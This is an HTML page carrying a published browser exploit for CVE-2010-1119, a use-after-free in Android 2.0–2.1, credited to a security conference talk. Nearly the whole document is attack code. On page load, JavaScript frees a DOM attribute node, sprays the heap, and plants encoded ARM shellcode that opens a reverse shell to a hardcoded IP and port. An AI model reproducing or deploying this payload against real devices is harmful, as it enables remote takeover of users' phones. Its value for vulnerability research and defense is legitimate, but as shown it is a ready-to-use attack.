<html>
<!-- 
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<head>
<script language="JavaScript">
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("u0058u0058")); };


var scode = unescape("u0060u0060");
var scode2 = unescape("u5005ue1a0");
var shell = unescape("u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0
u708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002");
shell += unescape("uae08"); // Port = 2222
shell += unescape("u000au0202"); // IP = 10.0.2.2
shell += unescape("u2000u2000"); // string terminate

 do
 {
  scode += scode;
  scode2 += scode2;

 } while (scode.length<=0x1000);
 
scode2 += shell
 

        target = new Array();
        for(i = 0; i < 300; i++){
          
            if (i<130){ target[i] = scode;}
            if (i>130){ target[i] = scode2;}

                  document.write(target[i]);
                  document.write("<br />");
                if (i>250){
                       //  alert("freeze");
                         nodes[0].textContent}

}

 }, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>